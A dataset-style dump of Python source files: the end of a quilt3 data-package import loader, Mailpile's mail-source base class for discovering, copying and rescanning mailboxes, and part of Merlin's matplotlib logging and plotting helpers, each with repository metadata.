module.__path__ = MODULE_PATH
return module
elif len(name_parts) == 3: # e.g. module.__name__ == quilt3.data.foo
namespace = name_parts[2]
# we do not know the name the user will ask for, so populate all valid names
registry = get_package_registry()
for pkg in registry.list_packages():
pkg_user, pkg_name = pkg.split('/')
if pkg_user == namespace:
module.__dict__[pkg_name] = Package._browse(pkg, registry=registry)
module.__path__ = MODULE_PATH
return module
else:
assert False
# pylint: disable=too-few-public-methods
class DataPackageFinder:
"""
Data package module loader finder. This class sits on `sys.meta_path` and returns the
loader it knows for a given path, if it knows a compatible loader.
"""
@classmethod
def find_spec(cls, fullname, path=None, target=None): # pylint: disable=unused-argument
"""
This functions is what gets executed by the loader.
"""
# an implementation for subpackage imports exists, but this has significant
# consistency issues. For now let's avoid, but you can see the full code at
# https://github.com/ResidentMario/package-autorelaod/blob/master/loader.py
name_parts = fullname.split('.')
if name_parts[:2] != ['quilt3', 'data'] or len(name_parts) > 3:
return None
else:
return ModuleSpec(fullname, DataPackageImporter())
def start_data_package_loader():
"""
Adds the data package loader to the module loaders.
"""
sys.meta_path.append(DataPackageFinder())
| 33.426829
| 95
| 0.639548
|
27a865939eb4c676aeb0638fd80ef8d72fab8217
| 32,263
|
py
|
Python
|
mailpile/mail_source/__init__.py
|
pall-valmundsson/Mailpile
|
6f2544860f64e53f4231358f3f63669b5f1134ed
|
[
"Apache-2.0"
] | null | null | null |
mailpile/mail_source/__init__.py
|
pall-valmundsson/Mailpile
|
6f2544860f64e53f4231358f3f63669b5f1134ed
|
[
"Apache-2.0"
] | null | null | null |
mailpile/mail_source/__init__.py
|
pall-valmundsson/Mailpile
|
6f2544860f64e53f4231358f3f63669b5f1134ed
|
[
"Apache-2.0"
] | null | null | null |
import os
import random
import re
import thread
import threading
import traceback
import time
import mailpile.util
from mailpile.eventlog import Event
from mailpile.i18n import gettext as _
from mailpile.i18n import ngettext as _n
from mailpile.mailboxes import *
from mailpile.mailutils import FormatMbxId
from mailpile.util import *
__all__ = ['mbox', 'maildir', 'imap']
class BaseMailSource(threading.Thread):
"""
MailSources take care of managing a group of mailboxes, synchronizing
the source with Mailpile's local metadata and/or caches.
"""
DEFAULT_JITTER = 15 # Fudge factor to tame thundering herds
SAVE_STATE_INTERVAL = 3600 # How frequently we pickle our state
INTERNAL_ERROR_SLEEP = 900 # Pause time on error, in seconds
RESCAN_BATCH_SIZE = 250 # Index at most this many new e-mails at once
MAX_MAILBOXES = 100 # Max number of mailboxes we add
MAX_PATHS = 5000 # Abort if asked to scan too many directories
# This is a helper for the events.
__classname__ = 'mailpile.mail_source.BaseMailSource'
def __init__(self, session, my_config):
threading.Thread.__init__(self)
self.daemon = mailpile.util.TESTING
self._lock = MSrcRLock()
self.my_config = my_config
self.name = my_config.name
self.session = session
self.alive = None
self.event = None
self.jitter = self.DEFAULT_JITTER
self._state = 'Idle'
self._sleeping = None
self._interrupt = None
self._rescanning = False
self._rescan_waiters = []
self._loop_count = 0
self._last_rescan_count = 0
self._last_rescan_completed = False
self._last_rescan_failed = False
self._last_saved = time.time() # Saving right away would be silly
def __str__(self):
rv = ': '.join([threading.Thread.__str__(self), self._state])
if self._sleeping > 0:
rv += '(%s)' % self._sleeping
return rv
def _pfn(self):
return 'mail-source.%s' % self.my_config._key
def _load_state(self):
with self._lock:
config, my_config = self.session.config, self.my_config
events = list(config.event_log.incomplete(source=self,
data_id=my_config._key))
if events:
self.event = events[0]
else:
self.event = config.event_log.log(
source=self,
flags=Event.RUNNING,
message=_('Starting up'),
data={'id': my_config._key})
if 'counters' not in self.event.data:
self.event.data['counters'] = {}
for c in ('copied_messages',
'indexed_messages',
'unknown_policies'):
if c not in self.event.data['counters']:
self.event.data['counters'][c] = 0
def _save_state(self):
self.session.config.event_log.log_event(self.event)
def _save_config(self):
self.session.config.save_worker.add_unique_task(
self.session, 'Save config', self.session.config.save)
def _log_status(self, message):
self.event.message = message
self.session.config.event_log.log_event(self.event)
self.session.ui.mark(message)
if 'sources' in self.session.config.sys.debug:
self.session.ui.debug('%s: %s' % (self, message))
def open(self):
"""Open mailboxes or connect to the remote mail source."""
raise NotImplemented('Please override open in %s' % self)
def close(self):
"""Close mailboxes or disconnect from the remote mail source."""
raise NotImplemented('Please override open in %s' % self)
def _has_mailbox_changed(self, mbx, state):
"""For the default sync_mail routine, report if mailbox changed."""
raise NotImplemented('Please override _has_mailbox_changed in %s'
% self)
def _mark_mailbox_rescanned(self, mbx, state):
"""For the default sync_mail routine, note mailbox was rescanned."""
raise NotImplemented('Please override _mark_mailbox_rescanned in %s'
% self)
def _path(self, mbx):
if mbx.path.startswith('@'):
return self.session.config.sys.mailbox[mbx.path[1:]]
else:
return mbx.path
def _check_interrupt(self, clear=True):
if mailpile.util.QUITTING or self._interrupt:
if clear:
self._log_status(_('Interrupted: %s')
% (self._interrupt or _('Quitting')))
self._interrupt = None
return True
else:
return False
def _sorted_mailboxes(self):
mailboxes = self.my_config.mailbox.values()
mailboxes.sort(key=lambda m: ('inbox' in m.name.lower() and 1 or 2,
'sent' in m.name.lower() and 1 or 2,
m.name))
return mailboxes
def sync_mail(self):
"""Iterates through all the mailboxes and scans if necessary."""
config = self.session.config
self._last_rescan_count = rescanned = errors = 0
self._last_rescan_completed = True
self._last_rescan_failed = False
self._interrupt = None
batch = self.RESCAN_BATCH_SIZE
errors = rescanned = 0
ostate = self._state
for mbx_cfg in self._sorted_mailboxes():
try:
with self._lock:
mbx_key = FormatMbxId(mbx_cfg._key)
path = self._path(mbx_cfg)
if (path in ('/dev/null', '', None)
or mbx_cfg.policy in ('ignore', 'unknown')):
continue
# Generally speaking, we only rescan if a mailbox looks like
# it has changed. However, 1/50th of the time we take a look
# anyway just in case looks are deceiving.
state = {}
if batch > 0 and (self._has_mailbox_changed(mbx_cfg, state) or
random.randint(0, 50) == 10):
self._state = 'Waiting... (rescan)'
if self._check_interrupt(clear=False):
self._last_rescan_completed = False
break
count = self.rescan_mailbox(mbx_key, mbx_cfg, path,
stop_after=batch)
if count >= 0:
self.event.data['counters'
]['indexed_messages'] += count
batch -= count
complete = ((count == 0 or batch > 0) and
not self._interrupt and
not mailpile.util.QUITTING)
if complete:
rescanned += 1
# If there was a copy, check if it completed
if not self.event.data.get('copying',
{'complete': True}
).get('complete'):
complete = False
# If there was a rescan, check if it completed
if not self.event.data.get('rescan',
{'complete': True}
).get('complete'):
complete = False
# OK, everything looks complete, mark it!
if complete:
self._mark_mailbox_rescanned(mbx_cfg, state)
else:
self._last_rescan_completed = False
else:
self._last_rescan_failed = True
self._last_rescan_completed = False
errors += 1
except (NoSuchMailboxError, IOError, OSError):
self._last_rescan_failed = True
errors += 1
except:
self._last_rescan_failed = True
self._log_status(_('Internal error'))
raise
self._state = 'Waiting... (disco)'
discovered = 0
if not self._check_interrupt():
discovered = self.discover_mailboxes()
status = []
if discovered > 0:
status.append(_('Discovered %d mailboxes') % discovered)
if discovered < 1 or rescanned > 0:
status.append(_('Rescanned %d mailboxes') % rescanned)
if errors:
status.append(_('Failed to rescan %d') % errors)
self._log_status(', '.join(status))
self._last_rescan_count = rescanned
self._state = ostate
return rescanned
def _jitter(self, seconds):
return seconds + random.randint(0, self.jitter)
def _sleep(self, seconds):
if self._sleeping != 0:
self._sleeping = seconds
while (self.alive and self._sleeping > 0 and
not mailpile.util.QUITTING):
time.sleep(min(1, self._sleeping))
self._sleeping -= 1
self._sleeping = None
play_nice_with_threads()
return (self.alive and not mailpile.util.QUITTING)
def _existing_mailboxes(self):
return set(self.session.config.sys.mailbox +
[mbx_cfg.local
for mbx_cfg in self.my_config.mailbox.values()
if mbx_cfg.local])
def _update_unknown_state(self):
have_unknown = 0
for mailbox in self.my_config.mailbox.values():
if mailbox.policy == 'unknown':
have_unknown += 1
self.event.data['counters']['unknown_policies'] = have_unknown
self.event.data['have_unknown'] = (have_unknown > 0)
def discover_mailboxes(self, paths=None):
config = self.session.config
self._log_status(_('Checking for new mailboxes'))
ostate, self._state = self._state, 'Discovery'
try:
existing = self._existing_mailboxes()
max_mailboxes = self.MAX_MAILBOXES - len(existing)
adding = []
paths = (paths or self.my_config.discovery.paths)[:]
while paths:
raw_fn = paths.pop(0)
fn = os.path.normpath(os.path.expanduser(raw_fn))
fn = os.path.abspath(fn)
if not os.path.exists(fn):
continue
if (raw_fn not in existing and
fn not in existing and
fn not in adding):
if self.is_mailbox(fn):
adding.append(fn)
if len(adding) > max_mailboxes:
break
if os.path.isdir(fn):
try:
for f in [f for f in os.listdir(fn)
if f not in ('.', '..')]:
nfn = os.path.join(fn, f)
if (len(paths) <= self.MAX_PATHS and
os.path.isdir(nfn)):
paths.append(nfn)
elif self.is_mailbox(nfn):
paths.append(nfn)
except OSError:
pass
if len(adding) > max_mailboxes:
break
new = {}
for path in adding:
new[config.sys.mailbox.append(path)] = path
for mailbox_idx in new.keys():
mbx_cfg = self.take_over_mailbox(mailbox_idx, save=False)
if mbx_cfg.policy != 'unknown':
del new[mailbox_idx]
if adding:
self._save_config()
return len(adding)
finally:
self._state = ostate
def take_over_mailbox(self, mailbox_idx, save=True):
config = self.session.config
disco_cfg = self.my_config.discovery # Stayin' alive! Stayin' alive!
with self._lock:
mailbox_idx = FormatMbxId(mailbox_idx)
self.my_config.mailbox[mailbox_idx] = {
'path': '@%s' % mailbox_idx,
'policy': disco_cfg.policy,
'process_new': disco_cfg.process_new,
}
mbx_cfg = self.my_config.mailbox[mailbox_idx]
mbx_cfg.apply_tags.extend(disco_cfg.apply_tags)
mbx_cfg.name = self._mailbox_name(self._path(mbx_cfg))
if disco_cfg.guess_tags:
self._guess_tags(mbx_cfg)
self._create_primary_tag(mbx_cfg, save=False)
self._create_local_mailbox(mbx_cfg, save=False)
if save:
self._save_config()
return mbx_cfg
def _guess_tags(self, mbx_cfg):
if not mbx_cfg.name:
return
name = mbx_cfg.name.lower()
tags = set(mbx_cfg.apply_tags)
for tagtype in ('inbox', 'drafts', 'sent', 'spam'):
for tag in self.session.config.get_tags(type=tagtype):
if (tag.name.lower() in name or
_(tag.name).lower() in name):
tags.add(tag._key)
mbx_cfg.apply_tags = sorted(list(tags))
def _mailbox_name(self, path):
return path.split('/')[-1]
def _create_local_mailbox(self, mbx_cfg, save=True):
config = self.session.config
disco_cfg = self.my_config.discovery
if mbx_cfg.local and mbx_cfg.local != '!CREATE':
if not os.path.exists(mbx_cfg.local):
config.flush_mbox_cache(self.session)
path, wervd = config.create_local_mailstore(self.session,
name=mbx_cfg.local)
wervd.is_local = mbx_cfg._key
mbx_cfg.local = path
if save:
self._save_config()
elif mbx_cfg.local == '!CREATE' or disco_cfg.local_copy:
config.flush_mbox_cache(self.session)
path, wervd = config.create_local_mailstore(self.session)
wervd.is_local = mbx_cfg._key
mbx_cfg.local = path
if save:
self._save_config()
return mbx_cfg
def _create_parent_tag(self, save=True):
disco_cfg = self.my_config.discovery
if disco_cfg.parent_tag:
if disco_cfg.parent_tag == '!CREATE':
name = (self.my_config.name or
(self.my_config.username or '').split('@')[-1] or
(disco_cfg.paths and
os.path.basename(disco_cfg.paths[0])) or
self.my_config._key)
if len(name) < 4:
name = _('Mail: %s') % name
disco_cfg.parent_tag = name
disco_cfg.parent_tag = self._create_tag(disco_cfg.parent_tag,
use_existing=False,
label=False,
icon='icon-mailsource',
unique=False)
if save:
self._save_config()
return disco_cfg.parent_tag
else:
return None
def _create_primary_tag(self, mbx_cfg, save=True):
config = self.session.config
if mbx_cfg.primary_tag and (mbx_cfg.primary_tag in config.tags):
return
# Stayin' alive! Stayin' alive!
disco_cfg = self.my_config.discovery
if not disco_cfg.create_tag:
return
# Make sure we have a parent tag, as that maybe useful when creating
# tag names or the primary tag itself.
parent = self._create_parent_tag(save=False)
# We configure the primary_tag with a name, if it doesn't have
# one already.
if not mbx_cfg.primary_tag:
mbx_cfg.primary_tag = self._create_tag_name(self._path(mbx_cfg))
# If we have a policy for this mailbox, we really go and create
# tags. The gap here allows the user to edit the primary_tag
# proposal before changing the policy from 'unknown'.
if mbx_cfg.policy != 'unknown':
try:
with_icon, as_label = None, True
if mbx_cfg.apply_tags:
# Hmm. Is this too clever? Rationale: if we are always
# applying other tags automatically, then we don't need to
# make the primary tag a label, that's just clutter. Yes?
as_label = False
# Furthermore, when displaying this tag, it makes sense
# to use the icon from the other tag we're applying to.
# these messages. Maybe.
try:
with_icon = config.tags[mbx_cfg.apply_tags[0]].icon
except (KeyError, ValueError):
pass
mbx_cfg.primary_tag = self._create_tag(mbx_cfg.primary_tag,
use_existing=False,
label=as_label,
icon=with_icon,
unique=False,
parent=parent)
except (ValueError, IndexError):
self.session.ui.debug(traceback.format_exc())
if save:
self._save_config()
BORING_FOLDER_RE = re.compile('(?i)^(home|mail|data|user\S*|[^a-z]+)$')
def _path_to_tagname(self, path): # -> tag name
"""This converts a path to a tag name."""
path = path.replace('/.', '/')
parts = ('/' in path) and path.split('/') or path.split('\\')
parts = [p for p in parts if not re.match(self.BORING_FOLDER_RE, p)]
tagname = parts.pop(-1).split('.')[0]
# if self.my_config.name:
# tagname = '%s/%s' % (self.my_config.name, tagname)
return CleanText(tagname.replace('_', ' '),
banned=CleanText.NONALNUM + '{}[]').clean
def _unique_tag_name(self, tagname): # -> unused tag name
"""This makes sure a tagname really is unused"""
tagnameN, count = tagname, 2
while self.session.config.get_tags(tagnameN):
tagnameN = '%s (%s)' % (tagname, count)
count += 1
return tagnameN
def _create_tag_name(self, path): # -> unique tag name
"""Convert a path to a unique tag name."""
return self._unique_tag_name(self._path_to_tagname(path))
def _create_tag(self, tag_name_or_id,
use_existing=True,
unique=False,
label=True,
icon=None,
parent=None): # -> tag ID
if tag_name_or_id in self.session.config.tags:
# Short circuit if this is a tag ID for an existing tag
return tag_name_or_id
else:
tag_name = tag_name_or_id
tags = self.session.config.get_tags(tag_name)
if tags and unique:
raise ValueError('Tag name is not unique!')
elif len(tags) == 1 and use_existing:
tag_id = tags[0]._key
elif len(tags) > 1:
raise ValueError('Tag name matches multiple tags!')
else:
from mailpile.plugins.tags import AddTag, Slugify
bogus_name = 'New-Tag-%s' % len(str(self.session.config))
AddTag(self.session, arg=[bogus_name]).run(save=False)
tags = self.session.config.get_tags(bogus_name)
if tags:
tags[0].slug = Slugify(tag_name, self.session.config.tags)
tags[0].name = tag_name
tags[0].label = label
if icon:
tags[0].icon = icon
if parent:
tags[0].parent = parent
tag_id = tags[0]._key
else:
raise ValueError('Failed to create tag?')
return tag_id
def interrupt_rescan(self, reason):
self._interrupt = reason or _('Aborted')
if self._rescanning:
self.session.config.index.interrupt = reason
def _process_new(self, msg, msg_ts, keywords, snippet):
return ProcessNew(self.session, msg, msg_ts, keywords, snippet)
def _copy_new_messages(self, mbx_key, mbx_cfg,
stop_after=-1, scan_args=None):
session, config = self.session, self.session.config
self.event.data['copying'] = progress = {
'running': True,
'mailbox_id': mbx_key,
'copied_messages': 0,
'copied_bytes': 0,
'complete': False
}
scan_args = scan_args or {}
count = 0
try:
with self._lock:
src = config.open_mailbox(session, mbx_key, prefer_local=False)
loc = config.open_mailbox(session, mbx_key, prefer_local=True)
if src == loc:
return count
# Perform housekeeping on the source_map, to make sure it does
# not grow without bounds or misrepresent things.
gone = []
src_keys = set(src.keys())
loc_keys = set(loc.keys())
for key, val in loc.source_map.iteritems():
if (val not in loc_keys) or (key not in src_keys):
gone.append(key)
for key in gone:
del loc.source_map[key]
# Figure out what actually needs to be downloaded, log it
keys = sorted(src_keys - set(loc.source_map.keys()))
progress.update({
'total': len(src_keys),
'total_local': len(loc_keys),
'uncopied': len(keys),
'batch_size': stop_after if (stop_after > 0) else len(keys)
})
# Go download!
for key in reversed(keys):
if self._check_interrupt(clear=False):
progress['interrupted'] = True
return count
play_nice_with_threads()
session.ui.mark(_('Copying message: %s') % key)
progress['copying_src_id'] = key
data = src.get_bytes(key)
loc_key = loc.add_from_source(key, data)
self.event.data['counters']['copied_messages'] += 1
del progress['copying_src_id']
progress['copied_messages'] += 1
progress['copied_bytes'] += len(data)
progress['uncopied'] -= 1
# This forks off a scan job to index the message
config.index.scan_one_message(
session, mbx_key, loc, loc_key,
wait=False, msg_data=data, **scan_args)
stop_after -= 1
if stop_after == 0:
progress['stopped'] = True
return count
progress['complete'] = True
except IOError:
# These just abort the download/read, which we're going to just
# take in stride for now.
progress['ioerror'] = True
except:
progress['raised'] = True
raise
finally:
progress['running'] = False
return count
def rescan_mailbox(self, mbx_key, mbx_cfg, path, stop_after=None):
session, config = self.session, self.session.config
with self._lock:
if self._rescanning:
return -1
self._rescanning = True
mailboxes = len(self.my_config.mailbox)
try:
ostate, self._state = self._state, 'Rescan(%s, %s)' % (mbx_key,
stop_after)
with self._lock:
apply_tags = mbx_cfg.apply_tags[:]
parent = self._create_parent_tag(save=True)
if parent:
tid = config.get_tag_id(parent)
if tid:
apply_tags.append(tid)
self._create_primary_tag(mbx_cfg)
if mbx_cfg.primary_tag:
tid = config.get_tag_id(mbx_cfg.primary_tag)
if tid:
apply_tags.append(tid)
scan_mailbox_args = {
'process_new': (mbx_cfg.process_new and
self._process_new or False),
'apply_tags': (apply_tags or []),
'stop_after': stop_after,
'event': self.event
}
count = 0
if mbx_cfg.local or self.my_config.discovery.local_copy:
# Note: We copy fewer messages than the batch allows for,
# because we might have been aborted on an earlier run and
# the rescan may need to catch up. We also start with smaller
# batch sizes, because folks are impatient.
self._create_local_mailbox(mbx_cfg)
max_copy = min(self._loop_count * 10,
int(1 + stop_after / (mailboxes + 1)))
self._log_status(_('Copying mail: %s (max=%d)'
) % (path, max_copy))
count += self._copy_new_messages(mbx_key, mbx_cfg,
stop_after=max_copy,
scan_args=scan_mailbox_args)
# Wait for background message scans to complete...
config.scan_worker.do(session, 'Wait', lambda: 1)
play_nice_with_threads()
self._log_status(_('Rescanning: %s') % path)
if 'rescans' in self.event.data:
self.event.data['rescans'][:-mailboxes] = []
return count + config.index.scan_mailbox(session,
mbx_key,
mbx_cfg.local or path,
config.open_mailbox,
**scan_mailbox_args)
except ValueError:
session.ui.debug(traceback.format_exc())
return -1
finally:
self._state = ostate
self._rescanning = False
def open_mailbox(self, mbx_id, fn):
# This allows mail sources to override the default mailbox
# opening mechanism. Returning false respectfully declines.
return None
def is_mailbox(self, fn):
return False
def run(self):
with self.session.config.index_check:
self.alive = True
self._load_state()
self.event.flags = Event.RUNNING
_original_session = self.session
def sleeptime():
if self._last_rescan_completed or self._last_rescan_failed:
return self.my_config.interval
else:
return 1
self._loop_count = 0
while self._loop_count == 0 or self._sleep(self._jitter(sleeptime())):
self._loop_count += 1
if not self.my_config.enabled:
break
self.name = self.my_config.name # In case the config changes
self._update_unknown_state()
if not self.session.config.index:
continue
waiters, self._rescan_waiters = self._rescan_waiters, []
for b, e, s in waiters:
try:
b.release()
except thread.error:
pass
if s:
self.session = s
try:
if 'traceback' in self.event.data:
del self.event.data['traceback']
if self.open():
self.sync_mail()
else:
self._log_conn_errors()
next_save_time = self._last_saved + self.SAVE_STATE_INTERVAL
if self.alive and time.time() >= next_save_time:
self._save_state()
if not self.my_config.keepalive:
self.close()
elif (self._last_rescan_completed and
not self.my_config.keepalive):
self.close()
except:
self.event.data['traceback'] = traceback.format_exc()
self.session.ui.debug(self.event.data['traceback'])
self._log_status(_('Internal error! Sleeping...'))
self._sleep(self.INTERNAL_ERROR_SLEEP)
finally:
for b, e, s in waiters:
try:
e.release()
except thread.error:
pass
self.session = _original_session
self._update_unknown_state()
self._save_state()
# self.event.flags = Event.COMPLETE
self._log_status(_('Shut down'))
def _log_conn_errors(self):
if 'connection' in self.event.data:
cinfo = self.event.data['connection']
if not cinfo.get('live'):
err_msg = cinfo.get('error', [None, None])[1]
if err_msg:
self._log_status(err_msg)
def wake_up(self, after=0):
self._sleeping = after
def rescan_now(self, session=None, started_callback=None):
begin, end = MSrcLock(), MSrcLock()
for l in (begin, end):
l.acquire()
try:
self._rescan_waiters.append((begin, end, session))
self.wake_up()
while not begin.acquire(False):
time.sleep(1)
if mailpile.util.QUITTING:
return self._last_rescan_count
if started_callback:
started_callback()
while not end.acquire(False):
time.sleep(1)
if mailpile.util.QUITTING:
return self._last_rescan_count
return self._last_rescan_count
except KeyboardInterrupt:
self.interrupt_rescan(_('User aborted'))
raise
finally:
for l in (begin, end):
try:
l.release()
except thread.error:
pass
def quit(self, join=False):
self.interrupt_rescan(_('Shut down'))
self.alive = False
self.wake_up()
if join:
self.join()
def ProcessNew(session, msg, msg_ts, keywords, snippet):
if 'r' in msg.get('status', '').lower():
return False
keywords.update(['%s:in' % tag._key for tag in
session.config.get_tags(type='unread')])
return True
def MailSource(session, my_config):
# FIXME: check the plugin and instanciate the right kind of mail source
# for this config section.
if my_config.protocol in ('mbox',):
from mailpile.mail_source.mbox import MboxMailSource
return MboxMailSource(session, my_config)
elif my_config.protocol in ('maildir',):
from mailpile.mail_source.maildir import MaildirMailSource
return MaildirMailSource(session, my_config)
elif my_config.protocol in ('imap', 'imap_ssl'):
from mailpile.mail_source.imap import ImapMailSource
return ImapMailSource(session, my_config)
elif my_config.protocol in ('pop3', 'pop3_ssl'):
from mailpile.mail_source.pop3 import Pop3MailSource
return Pop3MailSource(session, my_config)
raise ValueError(_('Unknown mail source protocol: %s'
) % my_config.protocol)
| 39.880099
| 79
| 0.521092
|
0fbb13876697fecd10ae9e9f60284cba938814dd
| 14,048
|
py
|
Python
|
src/logplot/logging_plotting.py
|
shartoo/merlin-tf-slim
|
4c7d48d5f634273dd51d2e29562d3ed1195d9151
|
[
"Apache-2.0"
] | null | null | null |
src/logplot/logging_plotting.py
|
shartoo/merlin-tf-slim
|
4c7d48d5f634273dd51d2e29562d3ed1195d9151
|
[
"Apache-2.0"
] | null | null | null |
src/logplot/logging_plotting.py
|
shartoo/merlin-tf-slim
|
4c7d48d5f634273dd51d2e29562d3ed1195d9151
|
[
"Apache-2.0"
] | null | null | null |
################################################################################
# The Neural Network (NN) based Speech Synthesis System
# https://svn.ecdf.ed.ac.uk/repo/inf/dnn_tts/
#
# Centre for Speech Technology Research
# University of Edinburgh, UK
# Copyright (c) 2014-2015
# All Rights Reserved.
#
# The system as a whole and most of the files in it are distributed
# under the following copyright and conditions
#
# Permission is hereby granted, free of charge, to use and distribute
# this software and its documentation without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of this work, and to
# permit persons to whom this work is furnished to do so, subject to
# the following conditions:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# - The authors' names may not be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THE UNIVERSITY OF EDINBURGH AND THE CONTRIBUTORS TO THIS WORK
# DISCLAIM ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO EVENT
# SHALL THE UNIVERSITY OF EDINBURGH NOR THE CONTRIBUTORS BE LIABLE
# FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN
# AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
# ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF
# THIS SOFTWARE.
################################################################################
# NOTES
# still to consider: pygal, for HTML5 SVG plotting
# this module provides the base classes that we specialise here
import logging # as logging
import os
import string
# for plotting
import matplotlib
# should make this user-configurable - TO DO later
# this line has to come before the import of matplotlib.pyplot
matplotlib.use('PDF')
import matplotlib.pyplot as plt
import pylab
# matplotlib needs to be passed numpy arrays
import numpy
# for sorting tuples
from operator import itemgetter
# TO DO - this needs to be attached to the logging module so that it's available via config options
# class PlotHandler(logging.FileHandler):
# """A handler for saving plots to disk"""
# def __init__(self,filename):
# logging.FileHandler.__init__(self,filename, mode='a', encoding=None, delay=False)
class PlotWithData(object):
# a generic plot object that contains both the underlying data and the plot itself
# this class needs to be subclassed for each specialised type of plot that we want
# the underlying data for the plot - a dictionary of data series
# each series is a list of data points of arbitrary type (e.g., tuples, arrays, ..)
data = None
# the plot generated from these data
plot = None
def __init__(self, name):
# clear the data series
self.data = {}
def add_data_point(self, series_name, data_point):
# if there is no data series with this name yet, create an empty one
if series_name not in self.data:
self.data[series_name] = []
# append this data point (e.g., it might be a tuple (x,y) )
# don't worry about data type or sorting - that is not our concern here
self.data[series_name].append(data_point)
def sort_and_validate(self):
# only applied if the data points are tuples, such as (x,y) values
# TO DO: first check that each series is a list of tuples, and that they have the same number of elements
# this method checks that all data series
# 1. have the same length
# 2. are sorted in ascending order of x
# 3. have identical values in their x series
# there has to be at least one data series
try:
assert len(self.data) > 0
except AssertionError:
logger.critical('No data series found in plot')
raise
# check lengths are consistent, sort, then check x values are identical
l = -1
reference_x = None
# print "starting with self.data=",self.data
for series_name, data_points in self.data.items():
if l > 0:
assert l == len(data_points)
else:
l = len(data_points)
# sort by ascending x value
data_points.sort(key=itemgetter(0))
if reference_x:
assert reference_x == [seq[0] for seq in data_points]
else:
# extract a list of just the x values
reference_x = [seq[0] for seq in data_points]
# print "ending with self.data=",self.data
def generate_plot(self, **kwargs):
logger = logging.getLogger("plotting")
logger.error('Cannot generate a plot from abstract class: PlotWithData')
# raise an exception here?
class MultipleSeriesPlot(PlotWithData):
def generate_plot(self, filename, title='', xlabel='', ylabel='', xlim=None, ylim=None):
logger = logging.getLogger("plotting")
logger.debug('MultipleSeriesPlot.generate_plot')
# a plot with one or more time series sharing a common x axis:
# e.g., the training error and the validation error plotted against epochs
# sort the data series and make sure they are consistent
self.sort_and_validate()
# if there is a plot already in existence, we will clear it and re-use it;
# this avoids creating extraneous figures which will stay in memory
# (even if we are no longer referencing them)
if self.plot:
self.plot.clf()
else:
# create a plot
self.plot = plt.figure()
splt = self.plot.add_subplot(1, 1, 1)
splt.set_title(title)
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
if xlim:
pylab.xlim(xlim)
if ylim:
pylab.ylim(ylim)
for series_name, data_points in self.data.items():
xpoints = numpy.asarray([seq[0] for seq in data_points])
ypoints = numpy.asarray([seq[1] for seq in data_points])
line, = splt.plot(xpoints, ypoints, '-', linewidth=2)
logger.debug('set_label for %s' % series_name)
line.set_label(series_name)
splt.legend()
# TO DO - better filename configuration for plots
self.plot.savefig(filename)
class SingleWeightMatrixPlot(PlotWithData):
def generate_plot(self, filename, title='', xlabel='', ylabel=''):
data_keys = list(self.data.keys())
key_num = len(data_keys)
self.plot = plt.figure()
if key_num == 1:
splt = self.plot.add_subplot(1, 1, 1)
im_data = splt.imshow(numpy.flipud(self.data[data_keys[0]][0]), origin='lower')
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
splt.set_title(title)
else: ## still plotting multiple image in one figure still has problem. the visualization is not good
logger.error('no supported yet')
self.plot.colorbar(im_data)
self.plot.savefig(filename) # , bbox_inches='tight'
# class MultipleLinesPlot(PlotWithData):
# def generate_plot(self, filename, title='', xlabel='', ylabel=''):
class LoggerPlotter(logging.getLoggerClass()):
"""Based on the built-in logging class, with added capabilities including plotting"""
# a dictionary to store all generated plots
# keys are plot names
# values are
plots = {}
# where the plots will be saved - a directory
plot_path = '/tmp' # default location
def __init__(self, name):
# initialise the logging parent class
# (should really use 'super' here I think, but that fails - perhaps because the built in logger class is not derived from 'object' ?)
logging.Logger.__init__(self, name)
def set_plot_path(self, path):
self.plot_path = path
def remove_all_plots(self):
self.plots = {}
def create_plot(self, plot_name, plot_object):
self.plots[plot_name] = plot_object(plot_name)
def add_plot_point(self, plot_name, series_name, data_point):
# add a data point to a named plot
if plot_name not in self.plots:
self.plots[plot_name] = PlotWithData(plot_name)
self.plots[plot_name].add_data_point(series_name, data_point)
def save_plot(self, plot_name, **kwargs):
logger = logging.getLogger("plotting")
if plot_name not in self.plots:
logger.warn('Tried to generate a plot called %s that does not exist' % plot_name)
# raise an exception here?
else:
# # the filename to save to is known by the handler, which needs to be assigned to this logger
# # look at the handlers attached to this logger instance
# ph=None
# for h in self.handlers:
# # we want an instance of a PlotHandler - we'll take the first one we find
# # (behaviour will be unpredictable if there is more than one handler of this type)
# if isinstance(h,PlotHandler):
# ph=h
# break
# if ph:
# TO DO - need to be sure of safe file names
if not os.path.isdir(self.plot_path):
os.makedirs(self.plot_path)
filename = self.plot_path + "/" + string.replace(plot_name, " ", "_") + ".pdf"
logger.info('Generating a plot in file %s' % filename)
self.plots[plot_name].generate_plot(filename, **kwargs)
# else:
# logger.warn('No handler of type PlotHandler is attached to this logger - cannot save plots')
class ColouredFormatter(logging.Formatter):
# colourising formatter adapted from an answer to this question on Stack Overflow
# http://stackoverflow.com/questions/384076/how-can-i-color-python-logging-output
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
COLOURS = {
'DEBUG': BLUE,
'INFO': GREEN,
'WARNING': YELLOW,
'ERROR': RED,
'CRITICAL': MAGENTA
}
max_level_name_width = '8'
# terminal escape sequences
RESET_SEQ = "\033[0m"
COLOUR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
def format(self, record):
if record.levelname in self.COLOURS:
# pad to fixed width - currently hardwired, should make this dynamic
# maximum width of level names, which is the 8 characters of "CRITICAL"
fixed_width_levelname = '{0:8s}'.format(record.levelname)
record.name = '{0:8s}'.format(record.name)
# The background is set with 40 plus the number of the color, and the foreground with 30
record.levelname = self.COLOUR_SEQ % (
30 + self.COLOURS[record.levelname]) + fixed_width_levelname + self.RESET_SEQ
return logging.Formatter.format(self, record)
def factory(fmt, datefmt):
